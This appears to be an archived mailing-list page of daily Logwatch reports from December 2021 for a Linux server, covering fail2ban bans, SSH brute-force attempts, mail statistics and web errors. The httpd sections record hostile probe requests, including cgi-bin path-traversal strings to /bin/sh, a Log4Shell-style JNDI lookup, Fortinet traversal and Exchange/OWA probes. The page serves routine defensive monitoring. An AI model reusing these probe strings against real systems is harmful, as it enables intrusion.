(134.236.247.145): 1 Time(s) unknown (141.98.10.82): 1 Time(s) unknown (146.185.79.101): 1 Time(s) unknown (oc-144-21-87-42.compute.oraclecloud.com): 1 Time(s) www-data (183.131.74.242): 1 Time(s) Invalid Users: Unknown Account: 111 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 15.502K Bytes accepted 15,874 15.502K Bytes sent via SMTP 15,874 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 16 Connections 6 Connections lost (inbound) 16 Disconnections 1 Removed from queue 1 Sent via SMTP ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 2.56.57.186: 1 time 42.159.80.91: 19 times 45.88.137.253: 1 time 45.114.192.154 (154-192-114-45.intechonline.net): 10 times 58.246.125.198: 39 times 61.93.240.18 (061093240018.static.ctinets.com): 33 times 101.34.136.222: 27 times 103.93.17.149 (web1.acmepadm.com): 3 times 103.254.198.67: 1 time 112.216.157.26: 3 times 119.96.175.156: 9 times 161.35.205.46: 1 time 164.90.203.55: 1 time 167.61.52.250 (r167-61-52-250.dialup.adsl.anteldata.net.uy): 12 times 183.82.7.11 (183.82.7.11.actcorp.in): 16 times 183.131.74.242: 29 times 193.169.254.138: 3 times 204.44.68.125 (204.44.68.125.static.quadranet.com): 7 times 211.45.247.122: 1 time Illegal users from: 2001:470:1:c84::23: 1 time undef: 79 times 1.215.195.10: 1 time 42.159.80.91: 9 times 45.114.192.154 (154-192-114-45.intechonline.net): 4 times 58.246.125.198: 11 times 61.93.240.18 (061093240018.static.ctinets.com): 17 times 65.49.20.69 (scan-20.shadowserver.org): 1 time 101.34.136.222: 11 times 112.216.157.26: 3 times 119.96.175.156: 7 times 120.157.16.17: 2 times 134.236.247.145: 1 time 141.98.10.82: 1 time 144.21.87.42 (oc-144-21-87-42.compute.oraclecloud.com): 1 time 146.185.79.101: 1 time 175.210.240.51: 2 times 179.43.187.37: 2 times 183.82.7.11 (183.82.7.11.actcorp.in): 7 times 183.131.74.242: 19 times 193.169.254.138: 4 times 204.44.68.125 (204.44.68.125.static.quadranet.com): 3 times 211.45.247.122: 3 times 220.74.0.120: 2 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

3 Jahre, 10 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sun Dec 12 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-11 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 33:33 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 1 sites probed the server 23.250.19.242 Requests with error response codes 400 Bad Request null: 7 Time(s) mstshash=Administr: 5 Time(s) /: 4 Time(s) mstshash=Domain: 4 Time(s) //cgi-bin/login.cgi: 1 Time(s) //doc/page/login.asp: 1 Time(s) //favicon.ico: 1 Time(s) /cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/bin/bash: 1 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s) 7: 1 Time(s) 499 (undefined) /apple-touch-icon.png: 4 Time(s) /build/cover-styles-pack.fef3ca2736298be630a4.css: 3 Time(s) /build/constant.js: 2 Time(s) /js/mathjax-config-extra.js: 2 Time(s) /build/MathJax/MathJax.js: 1 Time(s) /build/emojify.js/dist/css/basic/emojify.min.css: 1 Time(s) /build/font-pack.fef3ca2736298be630a4.css: 1 Time(s) /build/index-styles.fef3ca2736298be630a4.css: 1 Time(s) /favicon.ico: 1 Time(s) /fonts/SourceSansPro-Regular.woff: 1 Time(s) /fonts/SourceSansPro-Semibold.woff: 1 Time(s) 500 Internal Server Error /: 25 Time(s) /.env: 8 Time(s) /robots.txt: 4 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /$%7Bjndi:ldap://http443path.kryptoslogic- ... /http443path%7D: 1 Time(s) /.well-known/security.txt: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /actuator/health: 1 Time(s) /api/blog/5e09fe7d-84f5-4630-90c6-c0a838627227: 1 Time(s) /config.json: 1 Time(s) /debug/default/view?panel=config: 1 Time(s) /favicon.ico: 1 Time(s) /info.php: 1 Time(s) /owa/auth.owa: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) /sitemap.xml: 1 Time(s) 502 Bad Gateway /1M3B801aTLa4jlAz2WbSrw/pdf: 1 Time(s) /D1lk7Eb3Squ7uGiIXiErNg/pdf: 1 Time(s) /siegen17/pdf: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfA_vU: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfA_zn: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB097: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB0DQ: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB0QO: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB0T2: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB0hQ: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB0ih: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB0xD: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB0yJ: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB1Bx: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB1CC: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB1RZ: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB1TB: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB1hB: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB1iv: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfB1wq: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfU4fq: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfU4nl: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfU4ou: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfU4sZ: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfU56O: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=NsfU5D4: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=Nsg1sq4: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=Nsg1t3i: 1 Time(s) /socket.io/?noteId=4AG--CNeRGKHHcKGVNMHvw& ... lling&t=Nsg1tJK: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0-K: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB02j: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB04p: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB07s: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0DP: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0KY: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0NI: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0Sz: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0U0: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0ZU: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0aK: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0ct: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0ih: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0k7: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0pZ: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0q8: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0sT: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB0z5: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1-s: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB14E: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB159: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB167: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1DN: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1ES: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1KI: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1Lo: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1MC: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1UY: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1Ua: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1_n: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1aO: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1bP: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1bu: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1ke: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1lO: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1q-: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1rD: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB1rm: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB24k: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfB2GI: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfU4tj: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NsfU4zr: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=Nsg1s-X: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=Nsg1s_j: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=Nsg1szA: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=Nsg1tEB: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=Nsg1tFr: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=Nsg1tUM: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (124.152.57.24): 34 Time(s) root (41.208.150.118): 33 Time(s) root (180.33.245.35.bc.googleusercontent.com): 31 Time(s) root (1.215.195.10): 30 Time(s) root (122.187.114.134): 24 Time(s) root (117.131.215.49): 21 Time(s) unknown (203.129.197.98): 21 Time(s) unknown (180.33.245.35.bc.googleusercontent.com): 19 Time(s) root (leased-line-93-191-100-124.telecom.by): 18 Time(s) root (120.220.236.56): 17 Time(s) unknown (1.215.195.10): 17 Time(s) unknown (124.152.57.24): 16 Time(s) root (203.129.197.98): 15 Time(s) root (120.195.23.26): 13 Time(s) unknown (120.220.236.56): 12 Time(s) root (178.128.28.51): 11 Time(s) root (static-47-181-159-172.lsan.ca.frontiernet.net): 10 Time(s) unknown (41.208.150.118): 10 Time(s) root (175.209.89.234): 9 Time(s) root (203.128.242.166): 9 Time(s) unknown (117.131.215.49): 9 Time(s) unknown (122.187.114.134): 8 Time(s) unknown (120.195.23.26): 7 Time(s) unknown (leased-line-93-191-100-124.telecom.by): 6 Time(s) unknown (175.209.89.234): 5 Time(s) unknown (178.128.28.51): 5 Time(s) unknown (203.128.242.166): 5 Time(s) unknown (static-47-181-159-172.lsan.ca.frontiernet.net): 4 Time(s) root (154.114.57.143): 3 Time(s) root (123.156.225.58): 2 Time(s) root (181.13.51.177): 2 Time(s) root (static.222.52.itcsa.net): 2 Time(s) unknown (123.156.225.58): 2 Time(s) unknown (181.13.51.177): 2 Time(s) unknown (h-155-4-0-67.a147.priv.bahnhof.se): 2 Time(s) unknown (lfbn-nan-1-1064-9.w90-12.abo.wanadoo.fr): 2 Time(s) unknown (s0106206a940dde53.cg.shawcable.net): 2 Time(s) root (164.90.203.55): 1 Time(s) root (219.145.61.20): 1 Time(s) unknown (141.98.10.63): 1 Time(s) unknown (146.185.79.101): 1 Time(s) unknown (154.8.226.52): 1 Time(s) unknown (46.161.27.162): 1 Time(s) Invalid Users: Unknown Account: 158 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 2 Miscellaneous warnings 10.139K Bytes accepted 10,382 10.139K Bytes sent via SMTP 10,382 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 2 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 2 Total 4xx Rejects 100.00% ======== ================================================== 28 Connections 12 Connections lost (inbound) 28 Disconnections 1 Removed from queue 1 Sent via SMTP 1 Illegal address syntax in SMTP command 4 SMTP dialog errors 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 1.215.195.10: 30 times 35.245.33.180 (180.33.245.35.bc.googleusercontent.com): 31 times 41.208.150.118: 33 times 47.181.159.172 (static-47-181-159-172.lsan.ca.frontiernet.net): 10 times 93.191.100.124 (leased-line-93-191-100-124.telecom.by): 18 times 117.131.215.49: 21 times 120.195.23.26: 13 times 120.220.236.56: 17 times 122.187.114.134 (nsg-corporate-134.114.187.122.airtel.in): 24 times 123.156.225.58: 2 times 124.152.57.24: 34 times 154.114.57.143: 3 times 164.90.203.55: 1 time 175.209.89.234: 9 times 178.128.28.51: 11 times 181.13.51.177 (host-181-13-51-177.mendoza.gov.ar): 2 times 190.15.222.52 (static.222.52.itcsa.net): 2 times 203.128.242.166: 9 times 203.129.197.98: 15 times 219.145.61.20: 1 time Illegal users from: 2001:470:1:332::5: 1 time undef: 122 times 1.215.195.10: 17 times 35.245.33.180 (180.33.245.35.bc.googleusercontent.com): 19 times 41.208.150.118: 10 times 46.161.27.162: 1 time 47.181.159.172 (static-47-181-159-172.lsan.ca.frontiernet.net): 4 times 65.49.20.69 (scan-20.shadowserver.org): 1 time 68.147.15.24 (S0106206a940dde53.cg.shawcable.net): 2 times 90.12.249.9 (lfbn-nan-1-1064-9.w90-12.abo.wanadoo.fr): 2 times 93.191.100.124 (leased-line-93-191-100-124.telecom.by): 6 times 94.113.123.15 (ip-94-113-123-15.net.upcbroadband.cz): 2 times 117.131.215.49: 9 times 120.195.23.26: 7 times 120.220.236.56: 12 times 122.187.114.134 (nsg-corporate-134.114.187.122.airtel.in): 8 times 123.156.225.58: 2 times 124.152.57.24: 16 times 141.98.10.63: 1 time 146.185.79.101: 1 time 154.8.226.52: 1 time 155.4.0.67 (h-155-4-0-67.A147.priv.bahnhof.se): 2 times 175.209.89.234: 5 times 178.128.28.51: 5 times 181.13.51.177 (host-181-13-51-177.mendoza.gov.ar): 2 times 203.128.242.166: 5 times 203.129.197.98: 21 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

3 Jahre, 10 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sat Dec 11 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-10 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 23:23 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 89.248.165.52 -> 85.206.160.115:80: 1 Time(s) 89.248.165.52 -> hotmail-com.olc.protection.outlook.com:25: 1 Time(s) A total of 11 sites probed the server 117.254.52.193 165.227.146.27 185.142.236.40 205.185.119.11 34.77.162.24 45.134.144.108 5.188.210.227 61.219.11.151 66.240.205.34 68.183.236.23 89.248.165.52 Requests with error response codes 400 Bad Request null: 17 Time(s) /: 4 Time(s) mstshash=Domain: 4 Time(s) /favicon.ico: 3 Time(s) /.env: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/bin/bash: 1 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s) /iRf;: 1 Time(s) 85.206.160.115:80: 1 Time(s) \xB33\x86\xB3\x1A\x07\xC5\x0B\x03Wz\x0E>\x ... x09\xC0\x13\xC0: 1 Time(s) hotmail-com.olc.protection.outlook.com:25: 1 Time(s) http://5.188.210.227/echo.php: 1 Time(s) mstshash=Administr: 1 Time(s) 499 (undefined) /fonts/SourceSansPro-Regular.woff: 2 Time(s) /apple-touch-icon.png: 1 Time(s) /build/af7ae505a9eed503f8b8e6982036873e.woff2: 1 Time(s) /build/cover-styles-pack.fef3ca2736298be630a4.css: 1 Time(s) /build/emojify.js/dist/css/basic/emojify.min.css: 1 Time(s) /favicon.png: 1 Time(s) /fonts/SourceCodePro-Medium.woff: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NscO4zz: 1 Time(s) 500 Internal Server Error /: 21 Time(s) /.env: 5 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /favicon.ico: 2 Time(s) /robots.txt: 2 Time(s) ///remote/fgt_lang?lang=/../../../..//////////dev/: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /console/: 1 Time(s) /ecp/GP.js: 1 Time(s) /owa/auth.owa: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (188.254.173.120): 38 Time(s) root (101.254.233.194): 36 Time(s) root (206.189.35.215): 36 Time(s) root (185.74.4.189): 33 Time(s) root (bersyst.com): 33 Time(s) root (138.197.203.168): 19 Time(s) unknown (185.74.4.189): 17 Time(s) unknown (206.189.35.215): 17 Time(s) unknown (bersyst.com): 17 Time(s) root (220.178.31.90): 16 Time(s) root (110.80.17.26): 13 Time(s) unknown (188.254.173.120): 12 Time(s) root (183.92.214.38): 11 Time(s) unknown (138.197.203.168): 9 Time(s) unknown (220.178.31.90): 9 Time(s) root (static.222.52.itcsa.net): 8 Time(s) root (113.128.35.226): 6 Time(s) root (144.255.28.53): 6 Time(s) unknown (101.254.233.194): 6 Time(s) unknown (110.80.17.26): 6 Time(s) root (113.128.122.26): 5 Time(s) root (113.128.31.36): 5 Time(s) root (111.206.188.17): 4 Time(s) root (154.114.57.143): 4 Time(s) root (190.211.89.41): 4 Time(s) unknown (183.92.214.38): 4 Time(s) root (host-88-215-177-224.stavropol.ru): 3 Time(s) unknown (113.128.31.36): 3 Time(s) root (113.120.26.131): 2 Time(s) root (113.120.28.84): 2 Time(s) root (113.215.181.247): 2 Time(s) unknown (113.120.28.84): 2 Time(s) unknown (113.128.26.117): 2 Time(s) unknown (113.215.181.247): 2 Time(s) unknown (114.30.126.78.rev.sfr.net): 2 Time(s) unknown (124.43.64.13): 2 Time(s) unknown (87.123.144.202): 2 Time(s) root (113.128.26.117): 1 Time(s) root (201.119.167.25): 1 Time(s) root (211.76.125.186): 1 Time(s) root (36.133.170.229): 1 Time(s) unknown (111.206.188.17): 1 Time(s) unknown (113.128.122.26): 1 Time(s) unknown (113.128.35.226): 1 Time(s) unknown (119.57.156.38): 1 Time(s) unknown (134.236.247.145): 1 Time(s) unknown (144.255.28.53): 1 Time(s) unknown (154.114.57.143): 1 Time(s) unknown (179.ip-54-37-225.eu): 1 Time(s) unknown (190.211.89.41): 1 Time(s) unknown (195.133.18.104): 1 Time(s) unknown (209.141.47.245): 1 Time(s) unknown (host-88-215-177-224.stavropol.ru): 1 Time(s) unknown (slot0.epaperitaliait.com): 1 Time(s) unknown (static.222.52.itcsa.net): 1 Time(s) Invalid Users: Unknown Account: 126 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 2 Miscellaneous warnings 9.868K Bytes accepted 10,105 9.868K Bytes sent via SMTP 10,105 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 2 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 2 Total 4xx Rejects 100.00% ======== ================================================== 70 Connections 11 Connections lost (inbound) 70 Disconnections 1 Removed from queue 1 Sent via SMTP 1 SMTP dialog errors 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 36.133.170.229: 1 time 88.215.177.224 (host-88-215-177-224.stavropol.ru): 3 times 101.254.233.194: 36 times 104.37.188.123 (bersyst.com): 33 times 110.80.17.26: 13 times 111.206.188.17: 4 times 113.120.26.131: 2 times 113.120.28.84: 2 times 113.128.26.117: 1 time 113.128.31.36: 5 times 113.128.35.226: 6 times 113.128.122.26: 5 times 113.215.181.247: 2 times 138.197.203.168: 19 times 144.255.28.53: 6 times 154.114.57.143: 4 times 183.92.214.38: 11 times 185.74.4.189: 33 times 188.254.173.120: 38 times 190.15.222.52 (static.222.52.itcsa.net): 8 times 190.211.89.41 (41-89-211-190.patagoniagreen.com): 4 times 201.119.167.25: 1 time 206.189.35.215: 36 times 211.76.125.186 (211-76-125-186.static.kbronet.com.tw): 1 time 220.178.31.90: 16 times Illegal users from: 2001:470:1:c84::31: 1 time undef: 80 times 45.141.84.10: 1 time 54.37.225.179 (179.ip-54-37-225.eu): 1 time 65.49.20.68 (scan-19.shadowserver.org): 1 time 78.126.30.114 (114.30.126.78.rev.sfr.net): 2 times 87.123.144.202: 2 times 88.215.177.224 (host-88-215-177-224.stavropol.ru): 1 time 101.254.233.194: 6 times 104.37.188.123 (bersyst.com): 17 times 106.75.223.168: 1 time 110.80.17.26: 6 times 111.206.188.17: 1 time 113.120.28.84: 2 times 113.128.26.117: 2 times 113.128.31.36: 3 times 113.128.35.226: 1 time 113.128.122.26: 1 time 113.215.181.247: 2 times 119.57.156.38: 1 time 124.43.64.13: 2 times 134.236.247.145: 1 time 138.197.203.168: 9 times 144.255.28.53: 1 time 154.89.5.82: 1 time 154.114.57.143: 1 time 183.92.214.38: 4 times 185.74.4.189: 17 times 188.254.173.120: 12 times 190.15.222.52 (static.222.52.itcsa.net): 1 time 190.211.89.41 (41-89-211-190.patagoniagreen.com): 1 time 195.133.18.24 (slot0.epaperitaliait.com): 1 time 195.133.18.104: 1 time 206.189.35.215: 17 times 209.141.47.245: 1 time 220.178.31.90: 9 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

3 Jahre, 10 Monate

1
0
0 / 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

TOPF Dezember 2021